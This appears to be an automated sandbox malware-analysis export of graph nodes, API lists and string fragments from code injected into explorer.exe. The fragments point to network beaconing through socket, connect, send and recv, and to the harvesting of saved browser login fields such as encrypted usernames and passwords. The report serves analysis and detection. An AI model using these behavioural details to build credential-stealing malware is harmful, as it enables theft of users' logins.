20272 115dee70 20271->20272 20274 115dd967 20273->20274 20274->20271 20275 115ddf82 20276 115ddfb8 20275->20276 20278 115de081 20276->20278 20286 115de022 20276->20286 20287 115da5b2 20276->20287 20280 115de117 getaddrinfo 20278->20280 20281 115de134 20278->20281 20278->20286 20280->20281 20285 115de1b2 20281->20285 20281->20286 20290 115da732 20281->20290 20283 115de7f4 setsockopt recv 20283->20286 20284 115de729 20284->20283 20284->20286 20285->20286 20293 115da6b2 20285->20293 20288 115da5ec 20287->20288 20289 115da60a socket 20287->20289 20288->20289 20289->20278 20291 115da788 connect 20290->20291 20292 115da76a 20290->20292 20291->20285 20292->20291 20294 115da705 send 20293->20294 20295 115da6e7 20293->20295 20294->20284 20295->20294 20296 115d88c2 20297 115d8934 20296->20297 20298 115d89a6 20297->20298 20299 115d8995 ObtainUserAgentString 20297->20299 20299->20298 20300 115dd232 20302 115dd25c 20300->20302 20303 115dd334 20300->20303 20301 115dd410 NtCreateFile 20301->20303 20302->20301 20302->20303

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 115ddf82-115ddfb6 1 115ddfb8-115ddfbc 0->1 2 115ddfd6-115ddfd9 0->2 1->2 3 115ddfbe-115ddfc2 1->3 4 115ddfdf-115ddfed 2->4 5 115de8fe-115de90c 2->5 3->2 6 115ddfc4-115ddfc8 3->6 7 115de8f6-115de8f7 4->7 8 115ddff3-115ddff7 4->8 6->2 9 115ddfca-115ddfce 6->9 7->5 10 115ddfff-115de000 8->10 11 115ddff9-115ddffd 8->11 9->2 12 115ddfd0-115ddfd4 9->12 13 115de00a-115de010 10->13 11->10 11->13 12->2 12->4 14 115de03a-115de060 13->14 15 115de012-115de020 13->15 16 115de068-115de07c call 115da5b2 14->16 17 115de062-115de066 14->17 15->14 18 115de022-115de026 15->18 22 115de081-115de0a2 16->22 17->16 19 115de0a8-115de0ab 17->19 18->7 21 115de02c-115de035 18->21 23 115de144-115de150 19->23 24 115de0b1-115de0b8 19->24 21->7 22->19 25 115de8ee-115de8ef 22->25 23->25 26 115de156-115de165 23->26 27 115de0ba-115de0dc call 115dd942 24->27 28 115de0e2-115de0f5 24->28 25->7 29 115de17f-115de18f 26->29 30 115de167-115de178 call 115da552 26->30 27->28 28->25 32 115de0fb-115de101 28->32 34 115de1e5-115de21b 29->34 35 115de191-115de1ad call 115da732 29->35 30->29 32->25 37 115de107-115de109 32->37 40 115de22d-115de231 34->40 41 115de21d-115de22b 34->41 43 115de1b2-115de1da 35->43 37->25 42 115de10f-115de111 37->42 45 115de247-115de24b 40->45 46 115de233-115de245 40->46 44 115de27f-115de280 41->44 42->25 47 115de117-115de132 getaddrinfo 42->47 43->34 49 115de1dc-115de1e1 43->49 48 115de283-115de2e0 call 115ded62 call 115db482 call 115dae72 call 115df002 44->48 50 115de24d-115de25f 45->50 51 115de261-115de265 45->51 46->44 47->23 52 115de134-115de13c 47->52 49->34 50->44 53 115de26d-115de279 51->53 54 115de267-115de26b 51->54 52->23 53->44 54->48 54->53 69 115de48c-115de4b8 call 115ded62 call 115df262 63->69 70 115de35a-115de396 call 115ded62 call 115df262 call 115df002 63->70 64->63 66 115de2e8-115de2ef call 115db042 64->66 66->63 79 115de4d9-115de590 call 115df262 * 3 call 115df002 * 2 call 115db482 69->79 80 115de4ba-115de4d5 69->80 85 115de398-115de3b7 call 115df262 call 115df002 70->85 86 115de3bb-115de3e9 call 115df262 * 2 70->86 112 115de595-115de5b9 call 115df262 79->112 80->79 85->86 101 115de3eb-115de410 call 115df002 call 115df262 86->101 102 115de415-115de41d 86->102 101->102 105 115de41f-115de425 102->105 106 115de442-115de448 102->106 109 115de467-115de487 call 115df262 105->109 110 115de427-115de43d 105->110 111 115de44e-115de456 106->111 106->112 109->112 110->112 111->112 116 115de45c-115de45d 111->116 121 115de5bb-115de5cc call 115df262 call 115df002 112->121 122 115de5d1-115de6ad call 115df262 * 7 call 115df002 call 115ded62 call 115df002 call 115dae72 call 115db042 112->122 116->109 133 115de6af-115de6b3 121->133 122->133 135 115de6ff-115de72d call 115da6b2 133->135 136 115de6b5-115de6fa call 115da382 call 115da7b2 133->136 143 115de75d-115de761 135->143 144 115de72f-115de735 135->144 158 115de8e6-115de8e7 136->158 148 115de90d-115de913 143->148 149 115de767-115de76b 143->149 144->143 147 115de737-115de74c 144->147 147->143 152 115de74e-115de754 147->152 153 115de779-115de784 148->153 154 115de919-115de920 148->154 155 115de8aa-115de8df call 115da7b2 149->155 156 115de771-115de773 149->156 152->143 159 115de756 152->159 160 115de786-115de793 153->160 161 115de795-115de796 153->161 154->160 155->158 156->153 156->155 158->25 159->143 160->161 164 115de79c-115de7a0 160->164 161->164 167 115de7b1-115de7b2 164->167 168 115de7a2-115de7af 164->168 170 115de7b8-115de7c4 167->170 168->167 168->170 172 115de7f4-115de861 setsockopt recv 170->172 173 115de7c6-115de7ef call 115ded92 call 115ded62 170->173 177 115de8a3-115de8a4 172->177 178 115de863 172->178 173->172 177->155 178->177 181 115de865-115de86a 178->181 181->177 184 115de86c-115de872 181->184 184->177 186 115de874-115de8a1 184->186 186->177 186->178
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 7d49aa0ccb485988c93e38d229dfc41809d88a0dc84ec9f7e908ebe8a2626068
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: B4528C34618B598BDB59EF6CC8847DAB7E1FB94304F50462EC4AFC7146EE30A54ACB81

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 299 115dd232-115dd256 300 115dd8bd-115dd8cd 299->300 301 115dd25c-115dd260 299->301 301->300 302 115dd266-115dd2a0 301->302 303 115dd2bf 302->303 304 115dd2a2-115dd2a6 302->304 306 115dd2c6 303->306 304->303 305 115dd2a8-115dd2ac 304->305 307 115dd2ae-115dd2b2 305->307 308 115dd2b4-115dd2b8 305->308 309 115dd2cb-115dd2cf 306->309 307->306 308->309 310 115dd2ba-115dd2bd 308->310 311 115dd2f9-115dd30b 309->311 312 115dd2d1-115dd2f7 call 115dd942 309->312 310->309 316 115dd378 311->316 317 115dd30d-115dd332 311->317 312->311 312->316 318 115dd37a-115dd3a0 316->318 319 115dd334-115dd33b 317->319 320 115dd3a1-115dd3a8 317->320 321 115dd33d-115dd360 call 115dd942 319->321 322 115dd366-115dd370 319->322 323 115dd3aa-115dd3d3 call 115dd942 320->323 324 115dd3d5-115dd3dc 320->324 321->322 322->316 326 115dd372-115dd373 322->326 323->316 323->324 328 115dd3de-115dd40a call 115dd942 324->328 329 115dd410-115dd458 NtCreateFile call 115dd172 324->329 326->316 328->316 328->329 334 115dd45d-115dd45f 329->334 334->316 336 115dd465-115dd46d 334->336 336->316 337 115dd473-115dd476 336->337 338 115dd478-115dd481 337->338 339 115dd486-115dd48d 337->339 338->318 340 115dd48f-115dd4b8 call 115dd942 339->340 341 115dd4c2-115dd4ec 339->341 340->316 348 115dd4be-115dd4bf 340->348 346 115dd8ae-115dd8b8 341->346 347 115dd4f2-115dd4f5 341->347 346->316 349 115dd4fb-115dd4fe 347->349 350 115dd604-115dd611 347->350 348->341 351 115dd55e-115dd561 349->351 352 115dd500-115dd507 349->352 350->318 357 115dd567-115dd572 351->357 358 115dd616-115dd619 351->358 354 115dd509-115dd532 call 115dd942 352->354 355 115dd538-115dd559 352->355 354->316 354->355 362 115dd5e9-115dd5fa 355->362 363 115dd574-115dd59d call 115dd942 357->363 364 115dd5a3-115dd5a6 357->364 360 115dd61f-115dd626 358->360 361 115dd6b8-115dd6bb 358->361 368 115dd628-115dd651 call 115dd942 360->368 369 115dd657-115dd66b call 115dee92 360->369 365 115dd6bd-115dd6c4 361->365 366 115dd739-115dd73c 361->366 362->350 363->316 363->364 364->316 371 115dd5ac-115dd5b6 364->371 372 115dd6f5-115dd734 365->372 373 115dd6c6-115dd6ef call 115dd942 365->373 375 115dd7c4-115dd7c7 366->375 376 115dd742-115dd749 366->376 368->316 368->369 369->316 391 115dd671-115dd6b3 369->391 371->316 379 115dd5bc-115dd5e6 371->379 396 115dd894-115dd8a9 372->396 373->346 373->372 375->316 380 115dd7cd-115dd7d4 375->380 383 115dd74b-115dd774 call 115dd942 376->383 384 115dd77a-115dd7bf 376->384 379->362 386 115dd7fc-115dd803 380->386 387 115dd7d6-115dd7f6 call 115dd942 380->387 383->346 383->384 384->396 394 115dd82b-115dd835 386->394 395 115dd805-115dd825 call 115dd942 386->395 387->386 391->318 394->346 400 115dd837-115dd83e 394->400 395->394 396->318 400->346 404 115dd840-115dd886 400->404 404->396
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID: `
                                                                                                                              • API String ID: 823142352-2679148245
                                                                                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                              • Instruction ID: 1e46f0d57f271824a419fc6caacfcc2daac33c310ac9ae34f00f1d2f378e2521
                                                                                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                              • Instruction Fuzzy Hash: 87224770A18F4A9FDB89DF6CC4956AEB7E1FB98305F41062AE45ED3290DF30A451CB81

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 443 115dee12-115dee6e call 115dd942 NtProtectVirtualMemory 446 115dee7d-115dee8f 443->446 447 115dee70-115dee7c 443->447
                                                                                                                              APIs
                                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 115DEE67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706961497-0
                                                                                                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                              • Instruction ID: 659770865f8a6db49ed0a73bd0715b7d755a074d2bf449b9a35c613a89b480a0
                                                                                                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                              • Instruction Fuzzy Hash: E501B134628B884F8B88EF6CD48012AB7E4FBCE314F000B3EE99AC3250EB70C5414742

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 448 115dee0a-115dee38 449 115dee45-115dee6e NtProtectVirtualMemory 448->449 450 115dee40 call 115dd942 448->450 451 115dee7d-115dee8f 449->451 452 115dee70-115dee7c 449->452 450->449
                                                                                                                              APIs
                                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 115DEE67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706961497-0
                                                                                                                              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                              • Instruction ID: 0b01535b553b6ce99b34156f89678ba405caf30f00bae431e6ae1cc3e68a7bae
                                                                                                                              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                              • Instruction Fuzzy Hash: 9201A234628B884F8B48EF6C94412A6B3E5FBCE314F000B3EE99AC3241DB21D5024782

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • ObtainUserAgentString.URLMON ref: 115D89A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AgentObtainStringUser
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 2681117516-319646191
                                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction ID: 1c9141c1e3ecbeb92d8e86ccdf7382eaacde1f0a8dcc395947068e5ee2b9738f
                                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction Fuzzy Hash: 8431C031614B0D8BCF04EFA8C8847EEB7E1FB98205F40022AD84ED7240EF749645C78A

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • ObtainUserAgentString.URLMON ref: 115D89A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AgentObtainStringUser
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 2681117516-319646191
                                                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction ID: 016a0ad8bd4fa4c2556d2dae5dffcf88f384f2bb525bce78f5ebc92310c57b2f
                                                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction Fuzzy Hash: 9E219170614B5D8ACF05EFACC8847EEBBA1FF98209F40422AD45AD7240EF749645C78A

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateMutex
                                                                                                                              • String ID: .dll$el32$kern
                                                                                                                              • API String ID: 1964310414-1222553051
                                                                                                                              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                              • Instruction ID: 7c9b4e47a7e3d1025491eb4384c92d2461a26d5d5240b44eed665b6b12d544c3
                                                                                                                              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                              • Instruction Fuzzy Hash: FD415B74918A088FDF44EFA8C4957ED7BE0FFA8304F00457AC84ADB665DE309945CB85

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateMutex
                                                                                                                              • String ID: .dll$el32$kern
                                                                                                                              • API String ID: 1964310414-1222553051
                                                                                                                              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                              • Instruction ID: ebed484284c00eeda72d88daa0930492d23286d54e2335abcfd5e461451b9b17
                                                                                                                              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                              • Instruction Fuzzy Hash: F6413A74918A088FDF84EFA8C499BED77E1FFA8304F44416AC84ADB255DE309945CB85

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 289 115da72e-115da768 290 115da788-115da7ab connect 289->290 291 115da76a-115da782 call 115dd942 289->291 291->290
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: connect
                                                                                                                              • String ID: conn$ect
                                                                                                                              • API String ID: 1959786783-716201944
                                                                                                                              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                              • Instruction ID: ea282037e5a3bf9bc6daf3847e4660a530f13a91cd8db0818c0cfb842d1051c8
                                                                                                                              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                              • Instruction Fuzzy Hash: C3011E74618B188FCB84EF5CE088B55B7E0FB99314F1545AED90DCB266C774D9818BC2

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 294 115da732-115da768 295 115da788-115da7ab connect 294->295 296 115da76a-115da782 call 115dd942 294->296 296->295
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: connect
                                                                                                                              • String ID: conn$ect
                                                                                                                              • API String ID: 1959786783-716201944
                                                                                                                              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                              • Instruction ID: 2f359639e7dcc075c9c44bbddc3f8e2585c8db99e23be971cb5a76d3141a4b22
                                                                                                                              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                              • Instruction Fuzzy Hash: 25012C70618A1C8FCB84EF5CE088B55B7E0FB99314F1541AEA80DCB266CB74D9818BC2

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 407 115da6b2-115da6e5 408 115da705-115da72d send 407->408 409 115da6e7-115da6ff call 115dd942 407->409 409->408
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: send
                                                                                                                              • String ID: send
                                                                                                                              • API String ID: 2809346765-2809346765
                                                                                                                              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                              • Instruction ID: e0df41e250b49f9024e6b5e04a1c57c5a5d232b8134d1f49e8f16c89ff717b5f
                                                                                                                              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                              • Instruction Fuzzy Hash: 26012570518A1D8FDBC4DF5CD048B2577E0FB98314F1645AED85DCB266C670D881CB85

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 412 115da5b2-115da5ea 413 115da5ec-115da604 call 115dd942 412->413 414 115da60a-115da62b socket 412->414 413->414
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: socket
                                                                                                                              • String ID: sock
                                                                                                                              • API String ID: 98920635-2415254727
                                                                                                                              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                              • Instruction ID: 7cb7f721a61583ca2e81c53e7b2d70f839b9b304e48e593f8f1b0219b630e38e
                                                                                                                              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                              • Instruction Fuzzy Hash: FC0121706187188FCB84DF5CD048B55BBE0FB99314F1545ADE45ECB266C7B0C981CB86

                                                                                                                              Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed)
                                                                                                                              • Basic blocks: 115d22dd-115d2320 (call 115dd942); 115d2326; 115d2328-115d2339 (SleepEx, self-loop); 115d233b-115d2341; 115d2343-115d2349; 115d234b-115d2352; 115d2354-115d235a; 115d235c-115d236a (call 115dcf12); 115d2370-115d2376; 115d2378-115d237e; 115d2380-115d238a; 115d238c-115d23b1 (call 115d3432); 115d23b7-115d23bd; 115d23bf-115d23cf (call 115d2e72); 115d23d4-115d23db (loops back to 115d2328); 115d23e1-115d23f5 (call 115d20f2, loops back to 115d2328); 115d23fa-115d240e
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                              • Instruction ID: 10bca8d9fc46c62776b297be4d382a4f4a24a72c13561f598803e4b6bbefc755
                                                                                                                              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                              • Instruction Fuzzy Hash: 8D317A74A04B4ADFDF54DF2D80882A9B7A1FB94355F44467EC92DCB206CB34A490CFA1

                                                                                                                              Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed)
                                                                                                                              • Basic blocks: 115d2412-115d2446 (call 115dd942); 115d2448-115d2472 (call 115dfc9e, CreateThread); 115d2473-115d247d
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                              • Instruction ID: 3efa953e2f2f57765ccc069dc8eb3c0133103d6d1699be17f70ba6471823c554
                                                                                                                              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                              • Instruction Fuzzy Hash: 4AF0F634268B494FDB88EF2CD44563AF7E0FBE8215F41063EA94DC3264DA39D5824756
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                              • API String ID: 0-393284711
                                                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction ID: 51f89c19e5360dad1435fc6a85bb81912851d7c9d8b15c7e1514bcaa3cc2583b
                                                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction Fuzzy Hash: DAE17B74618F488FCBA4DF68C5857AAB7E1FB58301F404A2EA59FCB241DF30A541CB85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                              • API String ID: 0-393284711
                                                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction ID: 3b5e8fcc3c4f9af293940eb83fbf5b73f2f1fb121fb2ec155551e7913ab0beb2
                                                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction Fuzzy Hash: 7EE1697461CF488FCBA4DF68C4957AAB7E1FB58300F504A2EA59FC7255EF30A5018B89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                              • API String ID: 0-2916316912
                                                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction ID: 1f0ba8495bf5472b95f5e1dec70badbfe9b6a2b636623bbc648856b9da53d28d
                                                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction Fuzzy Hash: 97B18D30518B488EDB55DF68D486AEEB7F2FF58300F50452EE49ACB252EF70A445CB86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                              • API String ID: 0-2916316912
                                                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction ID: 2dbf8535cf493f8be2ab803a2a4e1e533c2673f1480c3b15bb4394d0daed56a4
                                                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction Fuzzy Hash: 65B19A30518B488EDB58EF68C486AEEB7F1FF98300F50851EE49AC7255EF70A505CB86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                              • API String ID: 0-1539916866
                                                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
